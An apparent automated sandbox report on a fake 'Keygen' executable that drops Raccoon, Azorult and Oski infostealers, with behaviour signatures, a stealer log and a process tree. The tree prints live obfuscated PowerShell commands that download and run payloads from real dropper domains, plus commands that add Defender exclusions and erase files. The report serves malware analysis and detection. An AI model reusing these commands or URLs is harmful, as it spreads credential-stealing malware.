Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

8

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

8

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    47s
  • max time network
    160s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (19) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 03:38:53 GMT Bot_ID: 664A9041-4AC4-46F3-B3DC-87DB4D57890E_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 5 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: GOHCSFBB - Username: Admin - Windows version: NT 10.0 - Product name: Windows 10 Pro - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 4095 MB (845 MB used) - Screen resolution: 1280x720 - Display devices: 0) Microsoft Basic Display Adapter ============

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 4 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 24 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (19) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (19) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3992
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F77.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (19) — ?????.exe""
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:352
      • C:\Users\Admin\AppData\Local\Temp\F77.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1664
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F77.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:396
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2704
          • C:\Users\Public\esi.exe
            "C:\Users\Public\esi.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:5112
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:4436
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:748
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 748 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\063257470311486\\* & exit
                  8⤵
                    PID:2764
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 748
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4776
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:4508
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:3100
              • C:\Users\Public\esi.exe
                "C:\Users\Public\esi.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                PID:3420
                • C:\Users\Admin\AppData\Local\Temp\DfhuSreOaZ.exe
                  "C:\Users\Admin\AppData\Local\Temp\DfhuSreOaZ.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4256
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\DfhuSreOaZ.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4616
                • C:\Users\Admin\AppData\Local\Temp\QgZMT6EdWQ.exe
                  "C:\Users\Admin\AppData\Local\Temp\QgZMT6EdWQ.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2104
                • C:\Users\Admin\AppData\Local\Temp\iXXxRGbJmt.exe
                  "C:\Users\Admin\AppData\Local\Temp\iXXxRGbJmt.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:4980
                  • \??\c:\windows\SysWOW64\cmstp.exe
                    "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\ucbgpkcg.inf
                    8⤵
                      PID:996
                  • C:\Users\Admin\AppData\Local\Temp\fcchyP6nPF.exe
                    "C:\Users\Admin\AppData\Local\Temp\fcchyP6nPF.exe"
                    7⤵
                    • Executes dropped EXE
                    • Windows security modification
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2696
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "powershell" Get-MpPreference -verbose
                      8⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4632
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\esi.exe"
                    7⤵
                      PID:4392
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /T 10 /NOBREAK
                        8⤵
                        • Delays execution with timeout.exe
                        PID:2964
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F77.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1644
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2780
            • C:\Windows\SysWOW64\timeout.exe
              timeout 1
              3⤵
              • Delays execution with timeout.exe
              PID:1724
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F77.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4048
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof 